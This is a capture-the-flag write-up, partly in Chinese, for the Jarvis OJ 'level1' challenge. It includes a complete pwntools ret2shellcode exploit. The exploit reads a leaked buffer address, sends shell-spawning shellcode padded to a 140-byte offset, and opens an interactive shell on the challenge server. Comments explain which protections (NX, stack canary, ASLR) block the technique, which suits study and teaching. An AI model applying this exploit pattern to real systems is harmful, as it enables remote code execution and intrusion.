nc pwn2.jarvisoj.com 9877
level1.80eacdcd51aca92af7749d96efad7fb5
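32 位程序的栈溢出,利用方式为 ret2shellcode:程序会主动输出缓冲区的地址,把 shellcode 写入缓冲区后,再将返回地址覆盖为该地址即可。这种方式的前提是栈可执行(未开启 NX)且没有栈保护(canary);开启这些保护并且不泄露栈地址,就能阻止这类利用。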
exp如下:
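"""ret2shellcode solution for the 32-bit "level1" exercise at pwn2.jarvisoj.com:9877.

The service prints a hexadecimal value after the prompt "What's this:" and
terminates it with '?'. This script treats that value as the address of the
input buffer, fills the buffer with shellcode, and overwrites the saved return
address with the leaked value.

Why this works, and what stops it (review notes):
  * The technique needs an executable stack. With NX/DEP enabled the return
    into the buffer would fault instead of running the shellcode.
  * It needs the return address to be overwritable without detection. A stack
    canary would abort the process before the function returns.
  * It needs the buffer address. Here the program discloses it; without that
    disclosure, ASLR would make the address unpredictable.
  Presumably the binary was built with none of these protections. Confirm
  with `checksec` on the downloaded file.
"""
from pwn import *

# Local alternative for offline testing against the downloaded binary:
# io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

# Tell pwntools which target to assemble the shellcode for.
context.arch = 'i386'
context.os = 'linux'

shellcode = asm(shellcraft.sh())

# Bytes literals are used throughout: pwntools tubes work on bytes, and the
# payload below is already built from bytes.
io.recvuntil(b"What's this:")
# Everything up to (not including) '?' is the hex address the service prints.
buf_addr = int(io.recvuntil(b'?', drop=True), 16)
info("buf_addr:" + hex(buf_addr))

# Pad with x86 NOPs (0x90) to 140 bytes, the offset the author determined for
# reaching the saved return address, then append the leaked address in
# little-endian 32-bit form.
payload = shellcode.ljust(140, b'\x90')
payload += p32(buf_addr)

io.send(payload)
io.interactive()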